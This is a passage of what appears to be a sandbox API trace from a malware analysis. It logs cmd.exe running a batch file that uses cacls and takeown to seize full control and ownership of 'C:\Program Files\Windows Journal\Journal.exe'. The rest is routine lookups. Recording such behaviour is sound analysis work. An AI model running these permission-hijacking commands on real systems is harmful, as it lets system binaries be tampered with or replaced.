(_String1="cacls", _String2="TITLE") returned -17 [0266.063] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0266.063] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0266.063] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0266.063] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0266.064] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0266.064] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0266.064] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0266.064] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0266.064] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0266.064] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0266.064] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0266.064] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0266.064] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0266.064] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0266.064] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0266.064] SetErrorMode (uMode=0x0) returned 0x0 [0266.064] SetErrorMode (uMode=0x1) returned 0x0 [0266.064] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1c528, lpFilePart=0xbbe8c4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xbbe8c4*="Desktop") returned 0x1d [0266.064] SetErrorMode (uMode=0x0) returned 0x1 [0266.064] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0266.064] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0266.065] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0266.065] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.065] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xbbe650, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbe650) returned 0xffffffff [0266.065] GetLastError () returned 0x2 [0266.065] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.065] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xbbe650, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbe650) returned 0xffffffff [0266.065] GetLastError () returned 0x2 [0266.065] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.065] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xbbe650, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbe650) returned 0xd1c8c0 [0266.066] FindClose (in: hFindFile=0xd1c8c0 | out: hFindFile=0xd1c8c0) returned 1 [0266.066] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xbbe650, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbe650) returned 0xffffffff [0266.066] GetLastError () returned 0x2 [0266.066] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xbbe650, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbe650) returned 0xd1c8c0 [0266.066] FindClose (in: hFindFile=0xd1c8c0 | out: hFindFile=0xd1c8c0) returned 1 [0266.066] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0266.066] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0266.066] GetConsoleTitleW (in: lpConsoleTitle=0xbbeb44, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.109] InitializeProcThreadAttributeList (in: lpAttributeList=0xbbea70, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xbbea54 | out: lpAttributeList=0xbbea70, lpSize=0xbbea54) returned 1 [0266.109] UpdateProcThreadAttribute (in: lpAttributeList=0xbbea70, dwFlags=0x0, Attribute=0x60001, lpValue=0xbbea5c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xbbea70, lpPreviousValue=0x0) returned 1 [0266.109] GetStartupInfoW (in: lpStartupInfo=0xbbeaa8 | out: lpStartupInfo=0xbbeaa8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0266.109] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0266.110] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0266.110] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0266.110] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0266.110] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0266.110] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0266.110] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0266.110] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0266.111] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\Journal.exe\" /E /G CIiHmnxMn6Ps:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xbbe9f8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Journal\\Journal.exe\" /E /G CIiHmnxMn6Ps:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xbbea44 | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\Journal.exe\" /E /G CIiHmnxMn6Ps:F /C", lpProcessInformation=0xbbea44*(hProcess=0xb8, hThread=0xb0, dwProcessId=0x370, dwThreadId=0x218)) returned 1 [0266.117] CloseHandle (hObject=0xb0) returned 1 [0266.117] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0266.117] GetEnvironmentStringsW () returned 0xd19dd8* [0266.117] FreeEnvironmentStringsA (penv="=") returned 1 [0266.117] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0277.733] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0xbbe9dc | out: lpExitCode=0xbbe9dc*=0x0) returned 1 [0277.733] CloseHandle (hObject=0xb8) returned 1 [0277.733] _vsnwprintf (in: _Buffer=0xbbeac4, _BufferCount=0x13, _Format="%08X", _ArgList=0xbbe9e4 | out: _Buffer="00000000") returned 8 [0277.733] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0277.733] GetEnvironmentStringsW () returned 0xd1e370* [0277.733] FreeEnvironmentStringsA (penv="=") returned 1 [0277.733] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0277.733] GetEnvironmentStringsW () returned 0xd1e370* [0277.733] FreeEnvironmentStringsA (penv="=") returned 1 [0277.733] DeleteProcThreadAttributeList (in: lpAttributeList=0xbbea70 | out: lpAttributeList=0xbbea70) [0277.733] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.733] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0277.881] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.881] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0277.881] _get_osfhandle (_FileHandle=0) returned 0x38 [0277.881] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0277.881] SetConsoleInputExeNameW () returned 0x1 [0277.881] GetConsoleOutputCP () returned 0x1b5 [0277.881] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0277.881] SetThreadUILanguage (LangId=0x0) returned 0x409 [0277.882] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xbbf204, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0277.882] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0277.882] _get_osfhandle (_FileHandle=3) returned 0xb8 [0277.882] SetFilePointer (in: hFile=0xb8, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0277.882] _get_osfhandle (_FileHandle=3) returned 0xb8 [0277.883] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0277.883] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xbbf1d4, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xbbf1d4*=0xc2, lpOverlapped=0x0) returned 1 [0277.883] SetFilePointer (in: hFile=0xb8, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0277.883] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0277.883] _get_osfhandle (_FileHandle=3) returned 0xb8 [0277.883] GetFileType (hFile=0xb8) returned 0x1 [0277.883] _get_osfhandle (_FileHandle=3) returned 0xb8 [0277.883] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0277.883] _wcsicmp (_String1="takeown", _String2=")") returned 75 [0277.883] _wcsicmp (_String1="FOR", _String2="takeown") returned -14 [0277.883] _wcsicmp (_String1="FOR/?", _String2="takeown") returned -14 [0277.883] _wcsicmp (_String1="IF", _String2="takeown") returned -11 [0277.883] _wcsicmp (_String1="IF/?", _String2="takeown") returned -11 [0277.883] _wcsicmp (_String1="REM", _String2="takeown") returned -2 [0277.883] _wcsicmp (_String1="REM/?", _String2="takeown") returned -2 [0277.884] _tell (_FileHandle=3) returned 47 [0277.884] _close (_FileHandle=3) returned 0 [0277.884] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xbbef98 | out: _Buffer="\r\n") returned 2 [0277.884] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.884] GetFileType (hFile=0x3c) returned 0x2 [0277.884] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0277.884] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbef70 | out: lpMode=0xbbef70) returned 1 [0277.885] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.885] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xbbef88, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbef88*=0x2) returned 1 [0277.885] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0277.885] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0277.885] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xbbef94 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0277.885] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xbbef94 | out: _Buffer=">") returned 1 [0277.885] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.885] GetFileType (hFile=0x3c) returned 0x2 [0277.885] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0277.885] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbef74 | out: lpMode=0xbbef74) returned 1 [0277.885] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.885] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xbbef8c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xbbef8c*=0x1e) returned 1 [0277.886] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.886] GetFileType (hFile=0x3c) returned 0x2 [0277.886] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0277.886] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf214 | out: lpMode=0xbbf214) returned 1 [0277.886] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.886] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xd17738*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xbbf22c, lpReserved=0x0 | out: lpBuffer=0xd17738*, lpNumberOfCharsWritten=0xbbf22c*=0x7) returned 1 [0277.886] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xbbf234 | out: _Buffer=" /F \"C:\\Program Files\\Windows Journal\\Journal.exe\" ") returned 51 [0277.886] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.886] GetFileType (hFile=0x3c) returned 0x2 [0277.886] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0277.886] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf20c | out: lpMode=0xbbf20c) returned 1 [0277.887] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.887] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x33, lpNumberOfCharsWritten=0xbbf224, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbf224*=0x33) returned 1 [0277.890] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xbbf248 | out: _Buffer="\r\n") returned 2 [0277.890] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.890] GetFileType (hFile=0x3c) returned 0x2 [0277.890] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0277.890] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf220 | out: lpMode=0xbbf220) returned 1 [0277.890] _get_osfhandle (_FileHandle=1) returned 0x3c [0277.890] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xbbf238, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbf238*=0x2) returned 1 [0277.891] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0277.891] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0277.891] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0277.891] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0277.891] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0277.891] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0277.891] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0277.891] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0277.891] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0277.891] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0277.891] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0277.891] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0277.891] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0277.891] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0277.891] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0277.891] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0277.891] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0277.891] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0277.891] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0277.891] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0277.891] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0277.891] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0277.891] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0277.891] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0277.891] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0277.891] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0277.891] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0277.891] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0277.891] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0277.891] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0277.891] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0277.891] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0277.891] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0277.891] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0277.891] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0277.891] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0277.891] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0277.891] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0277.891] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0277.891] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0277.891] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0277.891] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0277.892] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0277.892] SetErrorMode (uMode=0x0) returned 0x0 [0277.892] SetErrorMode (uMode=0x1) returned 0x0 [0277.892] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1f958, lpFilePart=0xbbefe4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xbbefe4*="Desktop") returned 0x1d [0277.892] SetErrorMode (uMode=0x0) returned 0x1 [0277.892] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0277.892] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0277.892] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0277.892] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0277.892] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xbbed70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbed70) returned 0xffffffff [0277.892] GetLastError () returned 0x2 [0277.892] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0277.892] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xbbed70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbed70) returned 0xffffffff [0277.893] GetLastError () returned 0x2 [0277.893] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0277.893] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xbbed70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbed70) returned 0xd1fb98 [0277.893] FindClose (in: hFindFile=0xd1fb98 | out: hFindFile=0xd1fb98) returned 1 [0277.893] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0xbbed70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbed70) returned 0xffffffff [0277.893] GetLastError () returned 0x2 [0277.893] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0xbbed70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbed70) returned 0xd1fb98 [0277.893] FindClose (in: hFindFile=0xd1fb98 | out: hFindFile=0xd1fb98) returned 1 [0277.893] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0277.893] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0277.893] GetConsoleTitleW (in: lpConsoleTitle=0xbbedb8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0277.894] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0277.894] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0277.894] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0277.894] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0277.894] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0277.894] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0277.894] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0277.894] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0277.894] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0277.894] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0277.894] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0277.894] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0277.894] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0277.894] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0277.894] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0277.894] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0277.894] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0277.894] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0277.894] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0277.894] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0277.894] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0277.894] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0277.894] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0277.894] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0277.894] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0277.894] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0277.894] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0277.894] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0277.894] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0277.894] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0277.894] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0277.894] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0277.894] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0277.894] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0277.894] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0277.894] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0277.894] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0277.894] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0277.894] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0277.894] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0277.894] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0277.894] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0277.894] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0277.894] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0277.895] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0277.895] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 